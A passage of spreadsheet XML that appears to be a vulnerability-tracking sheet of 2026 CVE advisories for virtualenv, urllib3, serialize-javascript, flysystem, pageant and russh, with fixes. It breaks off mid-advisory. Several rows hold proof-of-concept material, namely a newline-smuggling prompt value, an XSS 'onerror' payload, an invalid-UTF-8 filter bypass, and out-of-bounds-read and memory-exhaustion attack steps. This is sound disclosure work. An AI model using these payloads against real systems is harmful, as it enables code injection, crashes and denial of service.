      <c r="P123" s="5" t="inlineStr"/>
      <c r="Q123" s="5" t="inlineStr"/>
      <c r="R123" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="S123" s="5" t="inlineStr">
        <is>
          <t>`download_wheel()` runs `pip download` and hands the result straight to the seeder, with nothing checking the bytes it gets back. The embedded pip and setuptools wheels carry a `BUNDLE_SHA256` that virtualenv checks on every load, but a wheel fetched over the network for the periodic-update feature or the `--download` flag had no equivalent verification.
A compromised index, a stale mirror, or a MITM'd download (when TLS is intercepted, e.g. via a misconfigured or malicious CA) could substitute a different wheel under the same distribution/version/filename, and virtualenv would cache and seed it into every environment created afterward with no warning.
Fixed by computing the downloaded wheel's sha256 and comparing it against the digest PyPI's public JSON API reports for that exact release, independent of which index actually served the file. The check is skipped, not treated as failure, when a custom index (`PIP_INDEX_URL`, `PIP_EXTRA_INDEX_URL`, `PIP_INDEX`) is configured, since a private index can legitimately serve a different, intentionally rebuilt wheel. Fix: https://github.com/pypa/virtualenv/pull/3251</t>
        </is>
      </c>
      <c r="T123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102930</t>
        </is>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B124" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97687</t>
        </is>
      </c>
      <c r="D124" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E124" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F124" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G124" s="5" t="inlineStr"/>
      <c r="H124" s="5" t="inlineStr"/>
      <c r="I124" s="5" t="inlineStr"/>
      <c r="J124" s="5" t="inlineStr">
        <is>
          <t>urllib3</t>
        </is>
      </c>
      <c r="K124" s="5" t="inlineStr"/>
      <c r="L124" s="5" t="inlineStr">
        <is>
          <t>pip:urllib3</t>
        </is>
      </c>
      <c r="M124" s="5" t="inlineStr">
        <is>
          <t>2.8.0</t>
        </is>
      </c>
      <c r="N124" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O124" s="5" t="inlineStr"/>
      <c r="P124" s="5" t="inlineStr"/>
      <c r="Q124" s="5" t="inlineStr"/>
      <c r="R124" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-440</t>
        </is>
      </c>
      <c r="S124"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124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97687</t>
        </is>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B125" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97688</t>
        </is>
      </c>
      <c r="D125" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E125" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F125" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G125" s="5" t="inlineStr"/>
      <c r="H125" s="5" t="inlineStr"/>
      <c r="I125" s="5" t="inlineStr"/>
      <c r="J125" s="5" t="inlineStr">
        <is>
          <t>urllib3</t>
        </is>
      </c>
      <c r="K125" s="5" t="inlineStr"/>
      <c r="L125" s="5" t="inlineStr">
        <is>
          <t>pip:urllib3</t>
        </is>
      </c>
      <c r="M125" s="5" t="inlineStr">
        <is>
          <t>2.8.0</t>
        </is>
      </c>
      <c r="N125" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O125" s="5" t="inlineStr"/>
      <c r="P125" s="5" t="inlineStr"/>
      <c r="Q125" s="5" t="inlineStr"/>
      <c r="R125" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="S125"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125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97688</t>
        </is>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B126" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102938</t>
        </is>
      </c>
      <c r="D126" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="E126" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F126" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G126" s="5" t="inlineStr"/>
      <c r="H126" s="5" t="inlineStr"/>
      <c r="I126" s="5" t="inlineStr"/>
      <c r="J126" s="5" t="inlineStr"/>
      <c r="K126" s="5" t="inlineStr"/>
      <c r="L126" s="5" t="inlineStr">
        <is>
          <t>pip:virtualenv</t>
        </is>
      </c>
      <c r="M126" s="5" t="inlineStr">
        <is>
          <t>21.7.11</t>
        </is>
      </c>
      <c r="N126" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O126" s="5" t="inlineStr"/>
      <c r="P126" s="5" t="inlineStr"/>
      <c r="Q126" s="5" t="inlineStr"/>
      <c r="R126" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="S126" s="5" t="inlineStr">
        <is>
          <t>### Summary
`pyvenv.cfg` is a line-based format with no escape syntax. `PyEnvCfg.write()` wrote values verbatim, while `PyEnvCfg._read_values()` parses the file with `str.splitlines()`. A value containing a line boundary therefore became additional configuration lines, and because reading is last-wins, the injected keys replaced any key written earlier in the file.
### Impact
The `prompt` value is the reachable input: it is set by `--prompt`, by the `VIRTUALENV_PROMPT` environment variable, or from the config file, and `write()` emits `prompt` before `home`. A crafted prompt can therefore set `home` in the generated `pyvenv.cfg`:
```console
$ virtualenv --prompt $'x"\nhome = /attacker/path\nprompt = "z' venv
$ grep '^home' venv/pyvenv.cfg
home = /attacker/path
```
`home` is what tooling reads to locate the base interpreter, so a consumer that trusts it can be pointed elsewhere. `implementation`, `version_info`, `version`, `executable`, `command` and `virtualenv` are also written before `prompt` and can be replaced the same way.
This requires the prompt to come from somewhere other than the person running the command, for example a CI job templating a branch name into it, tooling deriving an environment name from user-supplied data, or an inherited `VIRTUALENV_PROMPT`. Where the operator supplies the prompt directly they already control the command line, and the effect is corruption rather than privilege gain: the value is truncated at the boundary and read back with a dangling quote.
### Details
The boundary set is the one `str.splitlines()` recognizes, which is wider than `\n`: `\r`, `\v`, `\f`, the file, group and record separators, `U+0085`, `U+2028` and `U+2029` were all written through unchanged and all split the line when read back.
### Patches
`PyEnvCfg.write()` now collapses those boundaries to spaces as it serializes each line, so it cannot emit a structurally invalid file regardless of what a caller places in `content`.
### Workarounds
Do not pass externally influenced data as the virtualenv prompt. Strip line boundaries from any value before using it as `--prompt` or `VIRTUALENV_PROMPT`.</t>
        </is>
      </c>
      <c r="T126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102938</t>
        </is>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B127" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97711</t>
        </is>
      </c>
      <c r="D127" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E127" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F127" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G127" s="5" t="inlineStr"/>
      <c r="H127" s="5" t="inlineStr"/>
      <c r="I127" s="5" t="inlineStr"/>
      <c r="J127" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K127" s="5" t="inlineStr"/>
      <c r="L127" s="5" t="inlineStr">
        <is>
          <t>npm:serialize-javascript</t>
        </is>
      </c>
      <c r="M127" s="5" t="inlineStr">
        <is>
          <t>7.1.2</t>
        </is>
      </c>
      <c r="N127" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O127" s="5" t="inlineStr"/>
      <c r="P127" s="5" t="inlineStr"/>
      <c r="Q127" s="5" t="inlineStr"/>
      <c r="R127" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-80</t>
        </is>
      </c>
      <c r="S127" s="5" t="inlineStr">
        <is>
          <t>### Impact
`serialize-javascript` escapes its output so it is safe to embed inside a
`&lt;script&gt;` element. In 7.1.1 that guarantee does not hold for **function
values**: a crafted function body can carry a literal, unescaped `&lt;/script&gt;`
into the output, terminating the script element early so the remainder is
parsed as HTML.
`SCRIPT_CLOSE_REGEXP` used `&lt;\/script[^&gt;]*&gt;` as its first alternative. The
character class excludes only `&gt;`, so a single match could run from one
`&lt;/script` all the way to the next `&gt;` anywhere in the source — swallowing a
second, complete `&lt;/script&gt;` along the way. Only one replacement is emitted
per match, and the plain-code branch neutralizes just the leading `&lt;`
(`'&lt; ' + match.slice(1)`), so the swallowed tag was re-emitted verbatim.
Reaching that shape requires `&lt;/script` in code position, which is legal
JavaScript: `x&lt;/script=+/` parses as `x &lt; /script=+/`, a comparison against a
regex literal.
```js
const serialize = require('serialize-javascript');
const src = "function f(x){ return x&lt;/script=+/ + '&lt;/script&gt;&lt;img src=x onerror=alert(1)&gt;' }";
const out = serialize({ h: new Function('return ' + src)() });
// {"h":function f(x){ return x&lt; /script=+/ + '&lt;/script&gt;&lt;img src=x onerror=alert(1)&gt;' }}
```
Embedded as the README documents (`&lt;script&gt;window.S = &lt;%= serialize(state) %&gt;&lt;/script&gt;`)
and parsed by Chromium, the script element ends at the injected tag and the
`&lt;img&gt;` becomes a live DOM node with its `onerror` handler executing in the
page origin.
Only the function path is affected. The same payload passed as **data** is
escaped correctly, and `options.isJSON` / non-function values are unaffected.
### Patches
Fixed in **7.1.2**. The wildcard now excludes `&lt;` as well as `&gt;`
(`[^&lt;&gt;]*`), so a match can never reach past a second `&lt;`. Every `&lt;/script`
in the source therefore either begins its own match or is followed by a
character the HTML tokenizer does not accept as ending a tag name — it ends
the tag name only on TAB, LF, FF, CR, SPACE, `/` or `&gt;`, and emits anything
else as text.
### Workarounds
Upgrade to **7.1.2**. If you cannot upgrade, 7.1.0 and earlier are
unaffected, or avoid serializing functions whose source text is
attacker-influenced.
### Regression note
This is a regression specific to 7.1.1, not a long-standing issue. 7.1.0 and
earlier applied the same wildcard but escaped the **entire** match, so no tag
survived. Downstream scanners defaulting to a `&gt;= 7.1.0` range would be
overly broad.</t>
        </is>
      </c>
      <c r="T127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97711</t>
        </is>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B128" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed</t>
        </is>
      </c>
      <c r="C128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102601</t>
        </is>
      </c>
      <c r="D128" s="5" t="inlineStr"/>
      <c r="E128" s="5" t="inlineStr"/>
      <c r="F128" s="5" t="inlineStr"/>
      <c r="G128" s="5" t="inlineStr"/>
      <c r="H128" s="5" t="inlineStr"/>
      <c r="I128" s="5" t="inlineStr"/>
      <c r="J128" s="5" t="inlineStr"/>
      <c r="K128" s="5" t="inlineStr"/>
      <c r="L128" s="5" t="inlineStr">
        <is>
          <t>composer:league/flysystem</t>
        </is>
      </c>
      <c r="M128" s="5" t="inlineStr">
        <is>
          <t>3.35.3</t>
        </is>
      </c>
      <c r="N128" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O128" s="5" t="inlineStr"/>
      <c r="P128" s="5" t="inlineStr"/>
      <c r="Q128" s="5" t="inlineStr"/>
      <c r="R128" s="5" t="inlineStr">
        <is>
          <t>CWE-150</t>
        </is>
      </c>
      <c r="S128" s="5" t="inlineStr">
        <is>
          <t>## Related public issue (context, not a duplicate)
Closed issue #1429 ("Handle non-UTF-8 paths", 2024-03-24) raised exactly this general concern and
even suggested detection via `preg_match('//u', $path) !== 1` -- note the reporter's suggested check
explicitly compares `!== 1`, which *would* correctly treat PCRE's `false` return as "reject." The
maintainer's reply pointed to the `PathNormalizer` interface as the place to implement this. The
control-character check that ended up shipping in `WhitespacePathNormalizer`
(`if (preg_match('#\p{C}+#u', $unixPath))`) addresses the general concern but does **not** use the
`!== 1`-style comparison the original issue suggested -- it uses a bare truthy check, which is exactly
the gap this report demonstrates. So this is not a duplicate of #1429; it's a concrete bypass
surviving in the fix that issue's concern led to.
## Vulnerability Details
**File**: `src/WhitespacePathNormalizer.php`, lines 22-28 (`normalizePath()`) -- the **default**
`PathNormalizer` used by `Filesystem` for every adapter (Local, FTP, SFTP, S3, AsyncAwsS3, Azure, GCS,
ZipArchive, GridFS, InMemory) unless the application supplies a custom one.
### Root Cause
```php
public function normalizePath(string $path): string
{
    $unixPath = str_replace('\\', '/', $path);
    if (preg_match('#\p{C}+#u', $unixPath)) {
        throw CorruptedPathDetected::forPath($path);
    }
    ...
```
`preg_match()` returns `false` (a PHP engine error) rather than `0` when the subject string is not
valid UTF-8 and the pattern uses the `/u` modifier -- PCRE can't even attempt the match. `false` and
`0` are both falsy in PHP, and `if (preg_match(...))` does not distinguish them. So a path containing
**any single invalid UTF-8 byte anywhere in the string** makes `preg_match()` fail with a "Malformed
UTF-8 characters" engine error, the `if` evaluates false, and `CorruptedPathDetected` is silently **not**
thrown -- even when the same string also contains literal control characters this exact check exists
to catch.
the identical payload IS correctly rejected once it's valid UTF-8:
```php
$n-&gt;normalizePath("foo\x1bbar");         // valid UTF-8, contains ESC -&gt; throws CorruptedPathDetected (correct)
$n-&gt;normalizePath("foo\x80\x1bbar");    // 0x80 = invalid lone UTF-8 continuation byte -&gt; NOT thrown (bypass)
```
The path-traversal protection is **unaffected** -- it's exact byte-string comparison on
`/`-delimited segments, independent of UTF-8 validity:
```php
$n-&gt;normalizePath("\x80/../../etc/passwd");   // still throws PathTraversalDetected
```
### Recommended Fix
```php
public function normalizePath(string $path): string
{
    $unixPath = str_replace('\\', '/', $path);
    $matched = preg_match('#\p{C}+#u', $unixPath);
    if ($matched !== 0) {
        // $matched === false means malformed UTF-8 -- must also be treated as corrupted,
        // not silently allowed through.
        throw CorruptedPathDetected::forPath($path);
    }
    ...
```
### Verification
Dynamically confirmed on `league/flysystem` HEAD `6837e1d` / tag `3.35.2`, PHP 8.4.22 CLI, end-to-end
through `LocalFilesystemAdapter`:
```
[1] write() succeeded -- normalizer did NOT reject the path.
[2] Actual bytes on disk: ...801b5b386d6e6f726d616c2d6c6f6f6b696e672d66696c652e7478741b5b306d...
[3] Filesystem::listContents() path contains raw ESC (0x1b): YES
[4] Raw terminal output (via `cat -v`): M-^@^[[8mnormal-looking-file.txt^[[0m^[[2K^[[1Aurgent-invoice.pdf</t>
        </is>
      </c>
      <c r="T128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102601</t>
        </is>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B129" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102820</t>
        </is>
      </c>
      <c r="D129" s="5" t="inlineStr"/>
      <c r="E129" s="5" t="inlineStr"/>
      <c r="F129" s="5" t="inlineStr"/>
      <c r="G129" s="5" t="inlineStr"/>
      <c r="H129" s="5" t="inlineStr"/>
      <c r="I129" s="5" t="inlineStr"/>
      <c r="J129" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K129" s="5" t="inlineStr"/>
      <c r="L129" s="5" t="inlineStr">
        <is>
          <t>rust:pageant</t>
        </is>
      </c>
      <c r="M129" s="5" t="inlineStr">
        <is>
          <t>0.2.3</t>
        </is>
      </c>
      <c r="N129" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O129" s="5" t="inlineStr"/>
      <c r="P129" s="5" t="inlineStr"/>
      <c r="Q129" s="5" t="inlineStr"/>
      <c r="R129" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-789</t>
        </is>
      </c>
      <c r="S129" s="5" t="inlineStr">
        <is>
          <t>## Summary
`MemoryMap::read` in the `pageant` crate (part of the russh workspace, used by
russh's SSH-agent client on Windows via `AgentClient::connect_pageant`) copies a
**peer-controlled** number of bytes out of an 8192-byte shared-memory view with
**no bounds check** — unlike the sibling `MemoryMap::write`, which correctly
rejects oversize access with `Error::Overflow`. The byte count comes straight
from a `u32` length prefix that the responding "Pageant" process writes into the
shared mapping. A malicious local process that answers as the Pageant agent can
therefore cause:
- an **out-of-bounds read** past the 8 KiB view (access violation → process
  crash; or disclosure of adjacent process memory if the following page is
  committed)
- an allocation of up to **~4 GiB** from a single `u32` (`vec![0; n]`).
This was reproduced **end-to-end against the real, unmodified `pageant` crate**
(not a model) on `x86_64-pc-windows-gnu` under Wine; see "Proof of concept".
## Impact
- **Availability / DoS (reliable).** `MemoryMap::read(size)` walks off the end of
  the 8192-byte view and faults on the next, unmapped page — an
  `EXCEPTION_ACCESS_VIOLATION` that crashes the russh SSH client. Independently,
  a `size` near `u32::MAX` drives a ~4 GiB `vec![0; n]` before any copy.
- **Confidentiality (conditional).** If memory immediately after the mapped view
  happens to be committed, `read` returns those adjacent bytes to russh as the
  "agent response", which russh then parses as agent identities/signatures. This
  arm depends on process memory layout, so it is opportunistic; the crash/alloc
  is the deterministic outcome.
- **Trust boundary.** russh locates the agent with
  `FindWindowW("Pageant", "Pageant")` and passes the shared-mapping name inside
  the `WM_COPYDATA` `COPYDATASTRUCT`. **Any** local process can register a window
  of class + title `"Pageant"`, receive that name, open the same mapping, and
  write a hostile `size`. So an unprivileged local process impersonating Pageant
  can attack every russh-based SSH client that uses the Pageant agent.
## Affected component
- `pageant/src/wmmessage.rs`
  - `MemoryMap::read` (`:160-171`) — no bound (contrast `MemoryMap::write`
    `:139-158`, which returns `Error::Overflow` when `pos + len &gt; length`).
  - `query_pageant_direct` (`:199-237`) — reads a 4-byte `u32` size from the
    shared mapping (`:233`) and calls `map.read(size)` (`:234`) with no check
    against `_AGENT_MAX_MSGLEN` (8192).
- Reached from russh via `AgentClient::connect_pageant` → `PageantStream` →
  `query_pageant_direct`.
Platform: **Windows only** (`cfg(windows)`), local attacker. Verified against
the `pageant` crate **v0.2.2** as shipped in russh **v0.63.1** (`d3ae702`, the
latest release). `read` has never had a bound in any revision
(`git log -p -- pageant/src/wmmessage.rs`).
## Details
```rust
fn write(&amp;mut self, data: &amp;[u8]) -&gt; Result&lt;(), Error&gt; {
    if self.pos + data.len() &gt; self.length {      // :140  BOUND PRESENT
        return Err(Error::Overflow);
    }
    ... copy_nonoverlapping(&amp;data[0], view+pos, data.len()) ...
}
fn read(&amp;mut self, n: usize) -&gt; Vec&lt;u8&gt; {         // :160  NO BOUND
    let out = vec![0; n];                         // n up to 0xFFFF_FFFF (CWE-789)
    unsafe {
        std::ptr::copy_nonoverlapping(
            self.view.Value.add(self.pos) as *const u8,   // view is length==8192
            out.as_ptr() as *mut u8,
            n,                                    // reads n bytes, may run past the view (CWE-125)
        );
    }
    self.pos += n;
    out
}
```
`query_pageant_direct` creates the mapping at `_AGENT_MAX_MSGLEN = 8192`, writes
the request, sends the `WM_COPYDATA`, then reads the response the peer wrote:
```rust
map.seek(0);
let mut buf = map.read(4);
let size = u32::from_be_bytes([buf[0],buf[1],buf[2],buf[3]]) as usize; // :233 peer-controlled
buf.extend(map.read(size));                                            // :234 unbounded
```
Nothing checks `4 + size &lt;= 8192`, so `map.read(size)` runs past the 8 KiB view.
## Proof of concept
Because the bug is Windows-only (`WM_COPYDATA` + `MapViewOfFile`), the PoC is a
Windows cross-build (`x86_64-pc-windows-gnu`) driven under **Wine**, entirely
inside a Linux container. It exercises the **real, unmodified** crate: the PoC
takes a path dependency on `pageant` and calls
`pageant::wmmessage::query_pageant_direct`, exactly what
`AgentClient::connect_pageant` uses. A second thread impersonates Pageant
(registers the window class + title `"Pageant"`) and, on `WM_COPYDATA`, opens
the shared mapping russh created and writes an attacker-chosen 4-byte
big-endian length.
`poc/run.sh` builds and runs it. Full log in `results/e2e-wine-run.log`:
```
======== LEG 1 — ATTACK: fake agent reports length 0x00080000 (512 KiB) &gt;&gt; 8192-byte view ========
[attacker] impersonating Pageant window is up (class+title "Pageant")
[victim ] calling pageant::wmmessage::query_pageant_direct() over the 8192-byte view ...
[attacker] WM_COPYDATA received; shared mapping = "PageantRequestpoc"
[attacker] wrote hostile response length = 524288 (0x00080000) into the 8192-byte view
wine: Unhandled page fault on read access to 0000000002092000 at address 00000002282CFDC4 ...
WINE-EXIT=5
======== LEG 2 — CONTROL: fake agent reports length 0x00000010 (16 B), in-bounds ========
[victim ] returned 20 bytes — request+response fit inside the 8192-byte view (in-bounds control); no fault
WINE-EXIT=0
```
- **LEG 1 (attack)**: an oversized `size` makes `MemoryMap::read` read past the
  8192-byte view; Wine reports an unhandled page fault at a page-aligned address
  (`0x…2092000`) — the out-of-bounds read as an access violation (crash). Exit
  code 5 = `STATUS_ACCESS_VIOLATION`.
- **LEG 2 (control)**: an in-bounds `size` returns cleanly. Same code path; the
  only difference is whether the peer's length exceeds the view — isolating the
  missing bound.
**Fix validation.** With `patch/pageant-read-bound.patch` applied and the PoC
rebuilt against the patched crate, the identical attack input is rejected
(`results/patched-wine-run.log`):
```
[attacker] wrote hostile response length = 524288 (0x00080000) into the 8192-byte view
[victim ] query_pageant_direct error: Overflow
WINE-EXIT=0
```
No fault; the read is refused at the bound, exactly as `write` already refuses
oversize writes. (A pure-logic Linux model of the same control flow is also
included as `poc/pageant_read_oob_demo.rs` / `results/logic-demo-run.log`.)
## Remediation
Mirror `write`'s guard in `read` and validate the response length before
allocating/copying. `patch/pageant-read-bound.patch`:
- `MemoryMap::read(n)` returns `Result&lt;Vec&lt;u8&gt;, Error&gt;` and returns
  `Error::Overflow` when `self.pos + n &gt; self.length`;
- `query_pageant_direct` propagates that `Result` and additionally rejects
  `size &gt; _AGENT_MAX_MSGLEN - 4` before `map.read(size)`.</t>
        </is>
      </c>
      <c r="T129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102820</t>
        </is>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B130" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102821</t>
        </is>
      </c>
      <c r="D130" s="5" t="inlineStr"/>
      <c r="E130" s="5" t="inlineStr"/>
      <c r="F130" s="5" t="inlineStr"/>
      <c r="G130" s="5" t="inlineStr"/>
      <c r="H130" s="5" t="inlineStr"/>
      <c r="I130" s="5" t="inlineStr"/>
      <c r="J130" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K130" s="5" t="inlineStr"/>
      <c r="L130" s="5" t="inlineStr">
        <is>
          <t>rust:russh</t>
        </is>
      </c>
      <c r="M130" s="5" t="inlineStr">
        <is>
          <t>0.63.2</t>
        </is>
      </c>
      <c r="N130" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O130" s="5" t="inlineStr"/>
      <c r="P130" s="5" t="inlineStr"/>
      <c r="Q130" s="5" t="inlineStr"/>
      <c r="R130" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="S130" s="5" t="inlineStr">
        <is>
          <t>## Summary
A russh **server** can be driven to unbounded heap growth (process OOM / kill) by
a peer that speaks only standard SSH messages, in the **default configuration**.
The peer starts a key re-exchange (sends `SSH_MSG_KEXINIT`) but never sends the
follow-up `SSH_MSG_KEX_ECDH_INIT`, leaving the server's kex state machine in
`SessionKexState::InProgress` **indefinitely**. While a rekey is in progress the
server's three message-drain paths are all gated off (`if !self.kex.active()`),
but the network-read path stays active, so every `SSH_MSG_CHANNEL_OPEN` the peer
sends is processed inline and appends one reply to an **unbounded** internal
queue (`priority_receiver`, an `UnboundedReceiver`) that is not dequeued until
the rekey completes. Because the peer decides whether the rekey ever completes,
the queue — and the server's memory — grows without bound.
This is reproducible end-to-end against a real russh server over a real
encrypted transport; see "Proof of concept". A one-line negative control (same
flood, no rekey) keeps memory flat, isolating the rekey window as the sole
trigger.
## Impact
- **Availability / DoS.** Server RSS climbs at roughly 3.3 KB per
  `CHANNEL_OPEN`, driven entirely by the peer, until the process is OOM-killed.
  In the reproduction one connection pushed the server from ~4 MB to **2.57 GB**
  (and past **4.8 GB** against the stock `echoserver` example) and it was still
  climbing when the flood was stopped.
- **Reached with standard messages, no special configuration.** Any handler is
  affected, including one that rejects every channel (the reply enqueued on
  rejection is exactly what accumulates). There is no per-connection cap on
  in-flight channel opens or on the queue, and the queue's sender has no
  backpressure.
- The peer keeps the connection alive simply by continuing to send, so the
  inactivity timer never fires.
## Affected component
- `russh/src/server/session.rs` — `Session::run` `tokio::select!` loop. The
  network-read arm is ungated; the three drain paths are gated on
  `!self.kex.active()`.
- `russh/src/server/mod.rs` — `reply()` routes a non-kex message received during
  a rekey straight to `server_read_encrypted` (inline processing).
- `russh/src/lib_inner.rs` — `ChannelOpenHandleInner`'s `accept`/`reject`/`Drop`
  all `send` a reply on an `UnboundedSender`.
Verified on **v0.63.1** (commit `d3ae702`), which is the latest release. The
gating logic predates it.
## Details
`Session::run` (`russh/src/server/session.rs:631`) drives a `tokio::select!`
(`:713`). Three of its message-drain sites are gated on `!self.kex.active()`:
- the pre-`select!` batch drain of `priority_receiver`/`receiver`
  (`session.rs:680`),
- the `priority_receiver.recv()` arm (`session.rs:762`),
- the `receiver.recv()` arm (`session.rs:770`, which also holds the only other
  `priority_receiver` drain at `:777`).
The fourth arm, `r = &amp;mut reading` (`session.rs:714`), is **ungated**: it reads
and processes one incoming packet every loop iteration regardless of rekey
state, calling `reply()` (`server/mod.rs:1128`).
During a **rekey**, `session.common.encrypted.is_some()`, so the strict-kex
message-ordering guard (`server/mod.rs:1143`, which is additionally gated on
`encrypted.is_none()`) does **not** apply. A non-kex message therefore falls
through `reply()` to `session.server_read_encrypted(handler, pkt)`
(`server/mod.rs:1232`) and is handled inline. For `SSH_MSG_CHANNEL_OPEN` this
reaches the channel-open handling, which hands the application a
`ChannelOpenHandle`.
Whether the handler accepts or (the trait default) rejects, the handle's
`accept` / `reject` / `Drop` all `send` a `Msg::ChannelOpenReply` on an
`UnboundedSender` (`russh/src/lib_inner.rs:560-603`; `Drop` sends
`AdministrativelyProhibited` at `:594-603`). That sender feeds
`priority_receiver`, declared `UnboundedReceiver&lt;Msg&gt;` (`session.rs:23`) and
created with `tokio::sync::mpsc::unbounded_channel()` (`session.rs:1522`). Its
only drain sites are the three arms gated off during the rekey. So each
`CHANNEL_OPEN` processed during the rekey window appends one reply (carrying a
`PendingChannelOpen` = channel params + mpsc `ChannelRef` + ids, a few KB
retained in practice) to a queue that is never dequeued.
Two facts make this unbounded and remote:
1. The server enters `InProgress` the moment it receives the peer's `KEXINIT`
   (`server/mod.rs:1153-1158`, `begin_rekey`) and only leaves it upon receiving
   the peer's `KEX_ECDH_INIT`. **The peer decides** whether to ever send that,
   so the window is attacker-held.
2. There is no per-connection cap on channels or on the priority queue, and the
   sender is unbounded (no backpressure).
### Root cause
The intended design was to *buffer* packets received during a rekey and replay
them afterwards: the fields `pending_reads: Vec&lt;Vec&lt;u8&gt;&gt;` and `pending_len: u32`
(`session.rs:26-27`) exist and are **drained** at kex completion
(`server/mod.rs:1194-1198`). But nothing ever **pushes** to `pending_reads` or
increments `pending_len` (they are dead — confirmed by grep across
`russh/src/`). Instead of being buffered, channel messages received during a
rekey are processed inline, and their replies pile up in the unbounded
`priority_receiver`. The missing piece is a bound on — or bounded deferral of —
channel processing while `kex.active()`.
## Proof of concept
Everything runs inside a container; nothing touches the host.
**Lab.** `poc/Dockerfile` builds `russh-lab:head` from Eugeny/russh @ `d3ae702`
(v0.63.1), default features (rust 1.91). A raw-SSH-client PoC
(`poc/poc_rekey_dos.rs`) implements curve25519-sha256 / ssh-ed25519 /
aes256-ctr / hmac-sha2-256 by hand, completes the handshake and a `publickey`
auth, then:
1. sends `SSH_MSG_KEXINIT` (server enters `kex.active()`),
2. **never** sends `KEX_ECDH_INIT` (rekey stalls, attacker-held),
3. floods `SSH_MSG_CHANNEL_OPEN`.
A minimal server (`poc/poc_server.rs`) uses the **trait-default**
`channel_open_session` (which rejects by dropping the handle), so the measured
growth is purely the undrained priority queue, not accepted-channel state.
`poc/run.sh` runs the attack leg and an identical **negative control** with no
rekey. Fresh run inside the lab, `N = 800,000` opens
(`results/rerun-2026-08-29.log`):
```
